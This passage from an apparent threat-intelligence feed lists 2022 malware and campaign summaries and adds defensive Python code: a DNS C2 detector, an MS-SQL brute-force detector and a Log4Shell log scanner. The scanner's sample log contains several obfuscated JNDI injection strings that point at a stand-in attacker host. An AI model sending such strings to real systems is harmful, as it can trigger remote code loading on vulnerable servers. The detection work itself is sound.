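def registered_domain(qname):
    """Crude split: last two labels. Assumption made for the example; a real
    deployment should use a public-suffix list (co.uk, com.au, ...)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def score_domains(lines, min_queries=5):
    """Per registered domain: query count, distinct subdomains, mean subdomain
    entropy and mean subdomain length. Domains queried fewer than min_queries
    times are dropped as statistically meaningless."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "ent": 0.0, "len": 0})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        dom = registered_domain(qname)
        sub = qname[: -len(dom)].rstrip(".") if len(qname) > len(dom) else ""
        s = stats[dom]
        s["queries"] += 1
        s["subs"].add(sub)
        s["ent"] += shannon_entropy(sub.replace(".", ""))
        s["len"] += len(sub)
    return {
        dom: {
            "queries": s["queries"],
            "unique_subdomains": len(s["subs"]),
            "mean_entropy": s["ent"] / s["queries"],
            "mean_sub_len": s["len"] / s["queries"],
        }
        for dom, s in stats.items()
        if s["queries"] >= min_queries
    }


def suspected_dns_c2(lines, min_queries=5, entropy=3.5, unique_ratio=0.8, min_len=20):
    """Domains whose subdomains look like encoded data: almost every query is a
    new label, labels are long and high-entropy. Thresholds are assumptions;
    baseline them against your own resolver logs before alerting."""
    return sorted(
        dom
        for dom, s in score_domains(lines, min_queries).items()
        if s["unique_subdomains"] / s["queries"] >= unique_ratio
        and s["mean_entropy"] >= entropy
        and s["mean_sub_len"] >= min_len
    )


# Constructed sample log. The beacon labels carry 32 hex characters built so that
# every hex digit appears exactly twice (entropy exactly 4.0 bits/char).
HEX = "0123456789abcdef"


def _rot(s, k):
    return s[k:] + s[:k]


SAMPLE_LOG = [
    *[f"2022-03-01T10:00:{i:02d}Z 10.0.0.5 A {_rot(HEX, i)}.{_rot(HEX, i + 5)}.update-cdn-sync.com"
      for i in range(8)],
    *["2022-03-01T10:01:00Z 10.0.0.5 A www.example.com"] * 4,
    *["2022-03-01T10:01:10Z 10.0.0.7 A mail.example.com"] * 2,
    *["2022-03-01T10:02:00Z 10.0.0.9 A static.vendor-cdn.net"] * 5,
    "2022-03-01T10:03:00Z 10.0.0.9 AAAA api.rare-domain.org",
]

if __name__ == "__main__":
    for dom in suspected_dns_c2(SAMPLE_LOG):
        print(f"possible DNS C2: {dom} {score_domains(SAMPLE_LOG)[dom]}")
```

Entropy alone is a weak signal (CDNs and anti-virus cloud lookups also produce hashed labels), which is why the heuristic additionally requires that nearly every query carries a never-before-seen subdomain; allow-listing known services and tuning the thresholds against a week of baseline traffic is the practical next step.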
SoulSearcher Malware
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- SoulSearcher Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet analyzed the evolution of the SoulSearcher malware, which targets Windows, collects sensitive information and executes additional malicious modules.
Emotet Malware Updated TTPs
MEDIUM
+
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet Malware Updated TTPs
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Cyble researchers came across Emotet email phishing campaigns that resemble earlier ones, using spam emails with malicious MS Excel attachments as the initial attack vector. They also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.
Magniber Ransomware being Redistributed
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware being Redistributed
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- ASEC researchers identified a redistribution campaign in which Magniber ransomware disguises itself as Windows update files. The distributed Magniber files carry a normal Windows Installer (MSI) extension. Magniber is currently distributed via typosquatting, targeting Chrome and Edge users on the latest Windows versions.
Conti Leaks_Seeder_Queries_010322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- Conti Leaks_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
TA445 Targets European Governments
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA445 Targets European Governments
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- The Proofpoint Threat Research team identified a likely nation-state-sponsored phishing campaign that uses a possibly compromised Ukrainian armed service member's email account to target European government personnel with a Lua-based malware dubbed SunSeed.
Conti and Karma attacked Healthcare
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Conti and Karma attacked Healthcare
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Sophos Labs researchers found that two ransomware groups, Conti and Karma, exploited the ProxyShell vulnerability to gain access to the network of a Canadian healthcare provider, using very different tactics. Karma exfiltrated data but did not encrypt the targeted systems; Conti entered the network later and encrypted them.
Daxin Backdoor espionage campaign
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- Daxin Backdoor espionage campaign
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Symantec found a new, highly sophisticated piece of malware, a backdoor dubbed Daxin, being used by a China-linked threat actor. Most targets have been government organizations of strategic interest to China. Symantec describes Daxin as the most advanced malware it has seen used by China-linked threat actors.
BlackCat Ransomware- Technical Analysis
MEDIUM
+
—
- Intel Source:
- AT&T
- Intel Name:
- BlackCat Ransomware- Technical Analysis
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- AT&T researchers analyzed samples of BlackCat ransomware, which was quite active in January 2022. The key takeaways: the ransomware is written in Rust and targets multiple platforms, including Windows and Linux.
BABYSHARK Malware
MEDIUM
+
—
- Intel Source:
- Huntress
- Intel Name:
- BABYSHARK Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Huntress identified APT activity attributed to North Korean threat actors targeting national security institutes. The group uses a malware family called BABYSHARK, with this variant customized to the specific victim environment.
Electron Bot - SEO poisoning malware
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Electron Bot - SEO poisoning malware
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point Research identified a new malware dubbed Electron Bot, which has infected over 5,000 active machines worldwide and is being distributed through Microsoft's official store. Electron Bot is a modular SEO poisoning malware used for social media promotion and click fraud. Once it persists on the targeted system, it executes attacker commands such as controlling social media accounts on Facebook, Google and SoundCloud.
ColdStealer Infostealer
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- ColdStealer Infostealer
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at ASEC analyzed a new infostealer, dubbed ColdStealer, that is disguised as a download of software cracks and tools. ColdStealer is distributed in two ways: either as a single piece of malware, like CryptBot or RedLine, or via dropper-type malware.
UNC3313 targets MiddleEast government
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC3313 targets MiddleEast government
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers recently responded to an intrusion by UNC3313 targeting a Middle East government. New targeted malware, Gramdoor and Starwhale, was used. The intrusion started with a targeted spear-phishing email.
QakBot Campaign with old Tactics
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- QakBot Campaign with old Tactics
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- The Cofense Phishing Defense Center analyzed emails delivering QakBot that reuse a familiar tactic seen in older campaigns.
Spear Phishing attacks on Ukraine
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Spear Phishing attacks on Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Networks identified a spear-phishing campaign attributed to UAC-0056. The targeted organizations were in Ukraine, and the payloads included the document stealer OutSteel and the downloader SaintBot.
New wiper and worm targets Ukraine
HIGH
+
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- New wiper and worm targets Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new set of malware, a wiper and a worm, after Russia's invasion of Ukraine. The wiper was dubbed IsaacWiper and the worm HermeticWizard; ESET also found a decoy ransomware called HermeticRansom, aka PartyTicket.
SockDetour Targets U.S. Defense Contractors
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- SockDetour Targets U.S. Defense Contractors
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Networks came across SockDetour, a stealthy custom malware that targeted U.S.-based defense contractors. Analysis shows SockDetour was delivered from an external FTP server to a U.S.-based defense contractor's internet-facing Windows server.
Evolution of EvilCorp
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Evolution of EvilCorp
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs assess with high confidence that WastedLocker, Hades, Phoenix Locker and PayloadBIN belong to the same cluster of malware operated by Evil Corp. They also published a technical analysis of Evil Corp's evolution from Dridex through to Macaw Locker and, for the first time, publicly described CryptOne and the role it plays in Evil Corp malware development.
UNC2596 deploys Cuba ransomware
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC2596 deploys Cuba ransomware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers track the ransomware gang as UNC2596 and the ransomware it deploys as COLDDRAW, commonly known as Cuba ransomware. The group has been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. The Cuba operation primarily targets the United States, followed by Canada.
TrickBot Switches to New Malware
MEDIUM
+
—
- Intel Source:
- Intel471
- Intel Name:
- TrickBot Switches to New Malware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- According to a recent Intel 471 report, TrickBot is shifting its operations and joining hands with the Emotet operators. It has also been noted that the Bazar malware family was recently linked to TrickBot, as its operators were taking over TrickBot's operations.
DDoS attacks against Ukrainian Websites
MEDIUM
+
—
- Intel Source:
- netlab360
- Intel Name:
- DDoS attacks against Ukrainian Websites
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Netlab 360 researchers analyzed the recent DDoS attacks on Ukrainian websites and tracked the botnets involved. The C2s belong to multiple malware families, including Mirai, Gafgyt, ripprbot, moobot and ircBot.
MuddyWater_Seeder Queries_25/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_Seeder Queries_25/02/2022
- Date of Scan:
- 2022-02-28
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Muddywater attacks U.S/Worldwide
HIGH
+
—
- Intel Source:
- FBI/NCSC/CISA
- Intel Name:
- Muddywater attacks U.S/Worldwide
- Date of Scan:
- 2022-02-25
- Impact:
- HIGH
- Summary:
- Authorities in the US and UK released a detailed advisory on the recent cyber-espionage campaign of MuddyWater, which is allegedly state-sponsored by Iran and works in the interests of MOIS. In this campaign the group has mainly targeted government and private organizations in the telecom, defense and oil and gas sectors across Asia, Africa, Europe and North America, using a variety of malware including PowGoop, Small Sieve, Mori and POWERSTATS.
TeamTNT targeting Linux servers
MEDIUM
+
—
- Intel Source:
- Intezer
- Intel Name:
- TeamTNT targeting Linux servers
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezer issued an alert on the TTPs of the TeamTNT threat actor. TeamTNT has been very active over the past year and is one of the predominant cryptojacking actors; it is currently targeting Linux servers.
Cyclops Blink malware by Sandworm
MEDIUM
+
—
- Intel Source:
- NCSC-UK
- Intel Name:
- Cyclops Blink malware by Sandworm
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- A joint advisory published by the NCSC (UK) and CISA, FBI and NSA (USA) identifies new malware used by the actor Sandworm. Sandworm, also known as Voodoo Bear, has previously been attributed to Russia's GRU. The malware, dubbed Cyclops Blink, appears to be a replacement for the VPNFilter malware exposed in 2018, and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.
HermeticWiper Malware
MEDIUM
+
—
- Intel Source:
- ESET
- Intel Name:
- HermeticWiper Malware
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- ESET Research discovered a new data wiper malware used against Ukraine. ESET detected that it was installed on hundreds of machines in the country. This follows the DDoS attacks against several Ukrainian websites.
Operation Cache Panda
LOW
+
—
- Intel Source:
- CyCraft
- Intel Name:
- Operation Cache Panda
- Date of Scan:
- 2022-02-23
- Impact:
- LOW
- Summary:
- Researchers at CyCraft came across a supply-chain campaign targeting Taiwan's financial trading sector; the campaign has been attributed to the allegedly state-sponsored threat actor APT10.
Cobalt Strike targets MS-SQL servers
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt Strike targets MS-SQL servers
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at ASEC discovered a campaign in which unpatched Microsoft SQL Server instances were targeted for the distribution of Cobalt Strike. The attacker typically scans port 1433 to check whether an MS-SQL server is exposed to the internet and, if it is, launches brute-force or dictionary attacks against the admin account.
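Both this entry and the Vollgar CoinMiner entry above (ASEC, 2022-03-02) describe the same initial access: an internet-exposed MS-SQL server and a brute-force or dictionary attack against its accounts. Every failed attempt is written to the SQL Server ERRORLOG as an 18456 "Login failed" event with the client address, so the attack is cheap to detect. The following is an added example of that detection, written for this page and not code from ASEC; the log lines are constructed to mimic the default ERRORLOG layout, and the threshold, window and IP addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# SQL Server ERRORLOG audit line for a failed login (error 18456). The layout is
# an assumption about the default log format; adjust if your instance differs.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[\d.]+)\]"
)


def parse_failures(lines):
    """Yield (timestamp, user, client_ip) for every failed-login line; skip the rest."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Sliding-window count of failed logins per client IP.

    Returns {client_ip: (peak_failures_inside_window, sorted_account_names)} for
    every client that reached `threshold` failures within `window`. Both values
    are assumptions to tune; a real dictionary attack on 'sa' produces hundreds
    of failures per minute, so a low threshold is safe to start with.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    users = defaultdict(set)      # ip -> account names attempted
    peak = {}
    for ts, user, ip in parse_failures(lines):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return {ip: (n, sorted(users[ip])) for ip, n in peak.items()}


# Constructed sample: one host hammering 'sa' six times in six seconds, plus one
# legitimate user mistyping a password once, plus the companion error line that
# SQL Server writes before each failure (it carries no client and is ignored).
def _failed(ts, user, ip):
    return (f"{ts}.12 Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {ip}]")


SAMPLE_LOG = [
    "2022-02-20 10:15:30.12 Logon       Error: 18456, Severity: 14, State: 8.",
    *[_failed(f"2022-02-20 10:15:3{i}", "sa", "203.0.113.5") for i in range(6)],
    _failed("2022-02-20 10:15:33", "appuser", "198.51.100.7"),
]

if __name__ == "__main__":
    for ip, (n, accounts) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} failed logins in window, accounts tried: {accounts}")
```

The alert is only half the job: the campaign in this entry succeeds because port 1433 is reachable from the internet and the admin account accepts weak passwords, so the fix is to remove the exposure (firewall or VPN), disable or rename the sa login, and move to Windows authentication with lockout policies where the application allows it.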
Predatory Sparrow targets Iran's BroadCaster
LOW
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Predatory Sparrow targets Iran's BroadCaster
- Date of Scan:
- 2022-02-22
- Impact:
- LOW
- Summary:
- A wave of cyberattacks flooded Iran in 2021 and early 2022. The CPR team published a technical analysis of one of these attacks, against the Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB), which occurred in late January 2022.
Qbot utilized to exploit ZeroLogon Vulnerability
MEDIUM
+
—
- Intel Source:
- DFIR Report
- Intel Name:
- Qbot utilized to exploit ZeroLogon Vulnerability
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report found threat actors deploying Qbot and exploiting the ZeroLogon vulnerability (CVE-2020-1472). The threat actor gained initial access through the execution of a malicious DLL.
Katana Botnet exploited Ukrainian websites
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- Katana Botnet exploited Ukrainian websites
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A team at Cado Security identified the 'Katana botnet' (a Mirai variant) as the source of the series of DDoS attacks against Ukrainian websites on 15-16 February. The impacted sites included bank, government and military websites. Ukrainian CERT, 360 Netlab and Bad Packets have also attributed these attacks to a Mirai botnet.
Arkei Infostealer utilizing SmokeLoader
MEDIUM
+
—
- Intel Source:
- Blackberry
- Intel Name:
- Arkei Infostealer utilizing SmokeLoader
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- The latest analysis of the Arkei infostealer shows that the cyber-thieves behind it are increasingly targeting people who use multifactor authentication, as well as crypto wallets. Arkei is often sold and distributed as malware-as-a-service and has been spotted using SmokeLoader as a deployment method. Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs in their operations.
CryptBot Infostealer
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- CryptBot Infostealer
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- ASEC researchers found a new version of the CryptBot infostealer being distributed via multiple websites offering free downloads of cracks for games and professional software. The current version of CryptBot uses only one infostealing C2.
TunnelVision exploiting Log4j
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- TunnelVision exploiting Log4j
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers observed TunnelVision activity focused on exploiting the Log4j vulnerability in VMware Horizon. The attackers actively exploit the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement. The researchers have been tracking this Iranian threat actor's activity in the Middle East and the US.
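This entry and the Barracuda entry above (2022-03-02) both concern exploitation of Log4Shell (CVE-2021-44228), where an attacker plants a ${jndi:...} lookup string in any request field the application logs. Scanners that grep for the literal string miss the obfuscated forms attackers use, so the check has to resolve Log4j's nested lookups first. The following is an added example of such a scanner over web access logs, written for this page and not code from SentinelOne, Barracuda or the Log4j project; the log lines, IP addresses and ports are constructed, and the resolver only implements the lower/upper transforms and the ':-' default-value syntax (other lookups are replaced by an opaque marker).

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization, the lookup we are hunting for. Log4j matches the prefix
# case-insensitively, so 'JNDI' and 'jNdI' count as well.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.I)


def normalize(text, max_rounds=50):
    """Resolve nested lookups the way vulnerable Log4j 2.x would, innermost first.

    Handles ${lower:x}, ${upper:x} and the ':-default' fallback syntax (covers
    ${::-j} and ${env:NaN:-j}). Any other lookup (env, sys, date, hostname...)
    becomes an opaque <...> marker so the loop always terminates. Input is
    URL-decoded twice because attackers encode '${' as %24%7B, sometimes twice.
    """
    s = unquote(unquote(text))
    for _ in range(max_rounds):
        changed = False

        def resolve(m):
            nonlocal changed
            expr = m.group(1)
            low = expr.strip().lower()
            if low.startswith("jndi:"):
                # Keep the lookup itself. Checked before ':-' because Log4j tries
                # the jndi lookup first and only then falls back to the default.
                return m.group(0)
            changed = True
            if ":-" in expr:
                return expr.split(":-", 1)[1]
            if low.startswith("lower:"):
                return expr[6:].lower()
            if low.startswith("upper:"):
                return expr[6:].upper()
            return "<" + expr + ">"

        s = INNER.sub(resolve, s)
        if not changed:
            break
    return s


def scan_access_log(lines):
    """Return [(line_number, scheme, normalized_line)] for every line carrying a
    JNDI lookup. The whole raw line is scanned because the payload can sit in
    the path, a query parameter, the User-Agent or any other logged header."""
    hits = []
    for no, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((no, m["scheme"].lower(), norm))
    return hits


# Constructed sample access log: four obfuscation styles from one scanner host,
# then two benign requests (the second uses a harmless ${date:...} lookup).
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Feb/2022:03:14:07 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [21/Feb/2022:03:14:08 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9:1389/b}"',
    '203.0.113.9 - - [21/Feb/2022:03:14:09 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/c}"',
    '203.0.113.9 - - [21/Feb/2022:03:14:10 +0000] "GET /portal/login?user=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.9%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.4 - - [21/Feb/2022:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Feb/2022:03:15:01 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, scheme, norm in scan_access_log(SAMPLE_LOG):
        print(f"line {no}: jndi lookup via {scheme} -> {norm}")
```

A hit only proves that someone tried; pair it with outbound connection logs from the application host to the resolved LDAP, RMI or DNS destination to tell attempts from successful callbacks, and treat the scanner as triage rather than protection, since the only fix for the hosts in this entry is patching Log4j (or Horizon) and removing the JNDI lookup capability.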
PseudoManuscrypt Malware
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- PseudoManuscrypt Malware
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- Multiple Windows machines in South Korea have been attacked by the PseudoManuscrypt malware, which is said to use the same tactics as CryptBot. Its targets have mostly been government and industrial organizations.
Remcos RAT
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos RAT
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- An ISC SANS researcher shared an analysis of a sample received via email as an attachment to a message posing as a purchase order. The researcher attributed the file to Remcos RAT.
Moses Staff targets Israeli Organization
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Moses Staff targets Israeli Organization
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.
Kraken- A new botnet
MEDIUM
+
—
- Intel Source:
- ZeroFox
- Intel Name:
- Kraken- A new botnet
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Researchers at ZeroFox found a new Go-based botnet dubbed Kraken. It is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. It targets crypto wallets including, but not limited to, Armory, Atomic Wallet, Bytecoin, Electrum, Ethereum, Exodus, Guarda, Jaxx Liberty and Zcash.
Gamaredon targets Ukraine
HIGH
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Gamaredon targets Ukraine
- Date of Scan:
- 2022-02-18
- Impact:
- HIGH
- Summary:
- The Russia-linked Gamaredon hacking group, aka Primitive Bear, has been actively targeting a Western government entity in Ukraine. The threat vector was a phishing attack that leveraged a job search and employment platform within the country as a conduit to upload its malware downloader, in the form of a resume, to an active job listing related to the targeted entity.
Power BI Phishing Campaign
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- Power BI Phishing Campaign
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- The Cofense Phishing Defense Center analyzed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Because Power BI is popular, widely used and trusted as a vendor, it has become a prime target for threat actors to spoof and abuse in phishing attacks.
BlackByte TTP_Seeder Queries_16/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- BlackByte TTP_Seeder Queries_16/02/2022
- Date of Scan:
- 2022-02-17
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Emotet new Infection Method
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet new Infection Method
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Networks Unit 42 found that the infamous Emotet malware has once again switched tactics. The email campaign propagates through socially engineered emails carrying malicious Excel files that contain an obfuscated Excel 4.0 macro. When the macro is activated, it downloads and executes an HTML application, which in turn downloads two stages of PowerShell to retrieve and execute the final Emotet payload.
ModifiedElephant APT
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- ModifiedElephant APT
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers attributed the intrusions to a group tracked as ModifiedElephant. The threat actor has been operational since at least 2012 and its activity aligns sharply with Indian state interests. It uses spear-phishing with malicious documents to deliver malware such as NetWire, DarkComet and keyloggers.
GlowSpark Campaign
MEDIUM
+
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSpark Campaign
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- InQuest Labs researchers analyzed a malicious document from the GlowSpark campaign, a possible attack vector in the WhisperGate attack. Some samples from this campaign are quite stealthy and infect the target successfully, allowing the threat actor to gain a strong foothold in the victim's network without leaving a large footprint.
MyloBot Malware
MEDIUM
+
—
- Intel Source:
- Minerva Labs
- Intel Name:
- MyloBot Malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- A new version of the MyloBot malware has been observed deploying malicious payloads used to send sextortion emails demanding a large sum in digital currency from victims. MyloBot also uses process hollowing, in which the attack code is injected into a suspended, hollowed-out process to circumvent process-based defenses.
LockBit 2.0 Ransomware TTPs
HIGH
+
—
- Intel Source:
- Picus Security
- Intel Name:
- LockBit 2.0 Ransomware TTPs
- Date of Scan:
- 2022-02-16
- Impact:
- HIGH
- Summary:
- On 4 February 2022 the FBI issued a FLASH report on LockBit 2.0 ransomware with a few IoCs. The Picus Security team has also shared the TTPs used by LockBit 2.0 operators in emerging ransomware campaigns.
Trickbot Attacks Global Giants customers
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Trickbot Attacks Global Giants customers
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point analyzed TrickBot's new evasion techniques and found that it is now targeting the customers of more than 60 firms worldwide. The TrickBot operators use anti-analysis techniques so that researchers cannot send automated requests to the command-and-control servers to obtain fresh web injects.
TA2541 APT targets Aviation
MEDIUM
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA2541 APT targets Aviation
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers identified the threat actor TA2541 targeting the aviation and aerospace industries. The actor commonly uses RATs to control compromised machines and is said to target hundreds of organizations across North America, Europe and the Middle East.
BitRAT malware
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- BitRAT malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Threat actors are using NFT (non-fungible token) information to lure users into downloading the BitRAT malware. The campaign uses malicious Excel files named 'NFT_Items' to attract targets. These files are hosted on Discord and appear to contain names of NFTs, forecasts of potential investment returns and selling quantities.
ShadowPad RAT linked to Chinese government
MEDIUM
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- ShadowPad RAT linked to Chinese government
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Secureworks linked recent ShadowPad malware activity to multiple China-based threat actors whose activity can be tied to a Chinese government ministry and the PLA. ShadowPad is the same malware that was behind the attacks on NetSarang, CCleaner and ASUS.
BlackByte Ransomware
MEDIUM
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- BlackByte Ransomware
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- BlackByte ransomware has compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food and agriculture). It recently made news when it hit the San Francisco 49ers ahead of the Super Bowl.
Magecart attacking Magento sites
MEDIUM
+
—
- Intel Source:
- Sansec
- Intel Name:
- Magecart attacking Magento sites
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- According to Sansec, more than 350 e-commerce stores were infected with malware in a single day. All the stores were hit by a payment skimmer loaded from a single domain. The domain is currently offline; the threat actors' goal was to steal the credit card information of customers of the targeted online stores.
OilRig's New Espionage Campaign-Out To Sea
MEDIUM
+
—
- Intel Source:
- ESET
- Intel Name:
- OilRig's New Espionage Campaign-Out To Sea
- Date of Scan:
- 2022-02-14
- Impact:
